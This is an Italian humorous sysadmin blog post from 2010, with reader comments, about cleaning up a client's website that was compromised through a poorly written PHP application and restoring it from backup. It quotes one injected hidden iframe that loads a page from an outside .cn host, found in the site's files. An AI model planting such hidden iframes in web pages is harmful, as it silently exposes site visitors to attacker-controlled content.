Storie dalla Sala Macchine

Home Page | Commenti | Articoli | Faq | Documenti | Ricerca | Archivio | Storie dalla Sala Macchine | Contribuire | Imposta lingua:en it | Login/Register

Cos'e' sta' roba?

Qualche tempo fa, un po' annoiato, mi sono messo a scrivere quello che succede nel mio ufficio. Rimuovendo i nomi per proteggere i colpevoli. Le "storie", pubblicate inizialmente sul gruppo it.comp.os.linux.sys, hanno trovato ricezione favorevole. Onde per cui, ho deciso di "preservarle" per i posteri.

Personaggi usuali:

IO - Sono io.
CL - Clueless Luser, normale utente, non capisce un tubo di computer anche se dovrebbe usarli, ma pensa di saperne molto di piu'.
UL - Uber Luser, manager di primo livello o project-manager, non ne sa molto di piu' (qualche volta di meno), ma prende il doppio di stipendio.
SL - SuperLuser, manager di livello elevato. Vedi sopra.
SUSL - Super-Ultra-Super-Luser, CEO o simile.
HR - Human Resource, persona impiegata nell'Amministrazione del Personale.
Bob - Tutto il personale del supporto tecnico si chiama Bob. Seriamente.

Vedi anche le FAQ.

Che domande

E venne il giorno che il mio collega T se ne ri-va' in ferie. E non e' che decide di andarsene in campagna. Nooooo... se ne va', nientepopodimeno che, in Canada. Per un mese (!).

Prima di andarsene in ferie mi passa un paio di mail relative all'arcifamosa applicazione di backup, adesso pare che ogni 2 x 3 l'arnese si ciucci via tutta la memoria disponibile e crashi la macchina che dovrebbe fare da server. Con il risultato che il backup non funziona piu' per niente e basta.

Io rimango della mia idea che un bel tar.gz + scp e' sempre la cosa migliore ma noooooo.

Comunque, mentre sono li' che litigo con i babbuini dell'applicazione (spiegami un po' perche' ti serve una shell con accesso root al mio server di backup per debuggarmi il problema), mi arriva Bert tutto trafelato.

Bert - CL!
IO - CL che?
Bert - Ti ricordi del problema di CL?
IO - A quale degli ennemila problemi di CL ti riferisci?
Bert - Quello della security del loro server.
IO - Sinceramente no, non me lo ricordo.
Bert - Ma T non ti ha passato il problema?
IO - L'unica cosa che mi ha passato e' questa roba del backup, per il resto nada. Sicuramente niente di relativo a CL ed al suo server.

Nel giro di dieci minuti Bert mi gira la mail, che altro non e' che una mail forwardata da qualcuno che lamenta che, in uno dei millemila siti che sono ospitati sul server di CL ci sta' un qualche tipo di malware - crapware - spyware - sarca$$o.

Lascio perdere per un attimo il backup e vado a vedere che succede sul sito di CL. E noto subito che il rapportino pare dire la verita'. In parecchi dei file di questa merdaccia trovo:


<iframe src="http://bigbestlite.cn:8080/index.php" width=179 height=102
style="visibility: hidden"></iframe>

Oh che gioia.

Naturalmente, nel giro di 5 minuti quella palla-al-piede di P arriva subito a rompere i marroni del come e del cosa. Quajo', e dammi almeno il tempo di guardarlo sto coso no?

Comunque da quello che vedo non e' qualcuno che ha fatto qualche cosa via ftp o SSH. Sembra proprio che il malandrino abbia usato quella meraviglia di phpapplicazione del menga di cui gia' dissi qui e qui. Il che mi semplifica la vita perche' posso tranquillamente dirgli di andarsi a lamentare con chi quell'arnese lo sviluppa invece di preoccuparmi io. Ma per il momento dovro' fare un bel restore del sito precedente. Precedente all'hackeraggio intendo. Ok, acchiappa quella meraviglia (sic) di applicazione di backup e chiedi il restore dell'intero sito al giorno $giornohackeraggio[-1].

E qui' casca l'asina: a quanto pare la password - chiave di decrittazione che sta' scritta in corrispondenza di CL nel nostro strepitoso database di configurazione e' sbagliata. Nel senso che il foxxuto programma di restore mi segnala errore di decrittazione per il 50% dei files e non ripristina una beata favonza.

Dopo un paio di madonne ed una lettura della documentazione di questo arnese scopro che se richiamo il malefico backup manager con un certo switch lui mi visualizza la password di crittazione. Mai la frase "ma a che ca$$o serve?" e' stato pronunciata piu' spesso.

Comunque, riesco a fare il restore, mi faccio una copia (un bel tar.gz) del sito 'incriminato', zappo via il tutto e poi ci scarico sopra la versione precedente.

E non funziona un tubo naturalmente. Perche' devi anche fare il restore del database ovviamente. Dopo un paio di ore di ravanamento il sito sembra riprendere vita e funzionare in modo decente. Almeno "decente" se si considera la phporcata ovviamente.

Un paio d'ore dopo P ritorna a rompere i marroni.

P - Sei riuscito a capire come hanno fatto ad entrarci dentro?
IO - Entrarci?
P - Intendo sul server di CL.
IO - Nessuno e' entrato da nessuna parte. Hanno usato quella chiavica di PhPorcata per gestire il sito.
P - E come hanno fatto? Non c'e' una password o roba cosi'?
IO - Non lo so se c'e' una password o no. Puo' darsi ci sia, dovresti domandarlo a CL. Ma conoscendo CL, se una password c'e', probabilmente e' "password".
P - E se non e' cosi'?
IO - Se non e' cosi' magari hanno usato un qualche baco di quella chiavica di coso, che tanto a posto comunque non mi sembra. In ogni caso, non sono affari nostri. Noi gestiamo il server dal punto di vista hardware ed OS, non gestiamo la schifosa applicazione.
P - Ma se il cliente ci domanda noi dobbiamo rispondere.
IO - Se vuoi la mia opinione, l'applicazione e' una chiavica e dovrebbe essere cestinata.
P - Ma non possiamo rispondergli cosi'.
IO - Perche' no?

P emette dei suoni volti ad indicare che non approva la mia idea ma non e' in grado di prodursi una risposta piu' efficace od articolata.

IO - Ed allora sarebbe opportuno che cercassero di "assicurarlo", nel senso di renderlo piu' sicuro, non stipulare una polizza, cambiando tutte le password e magari di rivedere il codice della chiavica in modo che il foxxuto coso non debba necessariamente avere tutti i permessi del mondo per poter funzionare.
P - Magari possiamo offrire di fare un controllo di sicurezza, come quello che tu facesti sul sito di $noicuriamoivostriinteressi.

Di quella cosa ne parlai qui, qui e per finire qui.

IO - Si'. Bello. Dopo che il sito e' stato hackato non c'e' piu' bisogno di domandare se il sito e' hackabile, la risposta la sai gia'.

Per la serie "chiudere la stalla dopo che i cavalli sono stati mangiati".

Davide
07/06/2010 08:00

Precedente Successivo

Commenti

I commenti sono aggiunti quando e soprattutto se ho il tempo di guardarli e dopo aver eliminato le cagate, spam, tentativi di phishing et similia. Quindi non trattenete il respiro.

7 messaggi this document does not accept new posts
Anonymous coward

Le mucche mangiate Di Anonymous coward postato il 07/06/2010 09:39

Se non ricordo male nel film critters (gli extraroditori) erano le mucche ad essere mangiate.
Vedila cosė non importa se è tuo appannaggio o non se tu ci metti le mani e sempre colpa tua.
Ultimamente sono andato in ministreroitalianoperleattivitàgutturali ed ho semplicemente sostituito una tastiera, 1 microsec dopo è collassata la rete, indovina di chi era la colpa? -- Anonymous coward

Davide Bianchi

@ Anonymous coward Di Davide Bianchi postato il 07/06/2010 09:42

> Ultimamente sono andato in ministreroitalianoperleattivitàgutturali ed ho semplicemente sostituito una tastiera, 1 microsec dopo è collassata la rete, indovina di chi era la colpa?

Ovviamente non hai verificato se la tastiera era compatibile con la rete
-- Davide Bianchi

Eremita Solitario

@ Davide Bianchi Di Eremita Solitario postato il 07/06/2010 13:05

> > Ultimamente sono andato in ministreroitalianoperleattivitàgutturali ed ho semplicemente sostituito una tastiera, 1 microsec dopo è collassata la rete, indovina di chi era la colpa?
>
> Ovviamente non hai verificato se la tastiera era compatibile con la rete
>

Si chiamano "Network-Keyboard", sembrano tastiere normali, anzi direi che sono proprio identiche, ma in realtà si collegano direttamete alla rete, e se sbagli... cade tutto, un po come i bambini che giocano a giro-giro-tondo...
-- Eremita Solitario

SicilianoEdivad

Hacking e Cracking Di SicilianoEdivad postato il 07/06/2010 13:32

CRACKato! D, proprio su queste cose mi sbagli...
Comunque per le tastiere, è risaputo che la colpa è SEMPRE del sistemista! :P
Io alla risposta di P avrei risposto: certo che si può fare, ma è estremamente complesso blablablayadayadayadayada perciò voglio $cifrone sulla mia busta paga.
Al massimo CL rifiutava, no? -- SicilianoEdivad

Max

CLienti Di Max postato il 07/06/2010 23:11

> P - Ma non possiamo rispondergli cosi'.
> IO - Perche' no?

"Perche' ci paga e se gli rispondi cosi` non ci paga piu`". Lo so, non e` giusta, ma e` LA risposta.
Che P non sia in grado di darti nemmeno quella mi fa pensare sempre peggio di lui.
-- Max

argaar

@ Max Di argaar postato il 08/06/2010 11:31

> > P - Ma non possiamo rispondergli cosi'.
> > IO - Perche' no?
>
> "Perche' ci paga e se gli rispondi cosi` non ci paga piu`". Lo so, non e` giusta, ma e` LA risposta.

io mi sono tolto la soddisfazione ieri...è arrivato il capo dell'azienda per la quale facciamo interventi e mi ha cihesto perchè non funzionasse la tal applicazione (Java), alla scrivania accanto alla mia c'era colui che l'ha implementata, io l'ho guardato e gli ho detto semplicemente: "Perchè è uno schifo e si blocca sempre" -- argaar

Muthley

Ferie... Di Muthley postato il 09/06/2010 21:07

> Nooooo... se ne va', nientepopodimeno che, in Canada. Per un mese (!).
Il sottoscritto, giusto giusto 2 anni fa a quest'ora era di ritorno da 1 mese di ferie da parenti tra Vancouver e Seattle.
Il bello è che da quando 8 mesi prima ho chiesto il permesso a $DaBoss a quando sono partito, si sono licenziate due persone (su 6 dipendenti). Uno dei due, che attualmente chiamiamo Barabba, ha lasciato una caterba di spaghetti code scritto coi piedi (leggerlo, è come tentare di riordinare gli spaghetti di un piatto di spaghetti alla carbonara). Il giorno dopo che questo è partito hanno cominciato ad esplodere bombe. -- Muthley

7 messaggi this document does not accept new posts

Precedente Successivo

Copyright

Il presente sito e' frutto del sudore della mia fronte (e delle mie dita), se siete interessati a ripubblicare uno degli articoli, documenti o qualunque altra cosa presente in questo sito per cortesia datemene comunicazione (o all'autore dell'articolo se non sono io), cosi' il giorno che faccio delle aggiunte potro' avvisarvi e magari mandarvi il testo aggiornato.

Questo sito era composto con VIM, ora e' composto con VIM ed il famosissimo CMS FdT.

Questo sito non e' ottimizzato per la visione con nessun browser particolare, ne' richiede l'uso di font particolari o risoluzioni speciali. Siete liberi di vederlo come vi pare e piace, o come disse qualcuno: "Finalmente uno dei POCHI siti che ancora funzionano con IE5 dentro Windows 3.1".

Web Interoperability Pleadge Support This Project
Powered By Gojira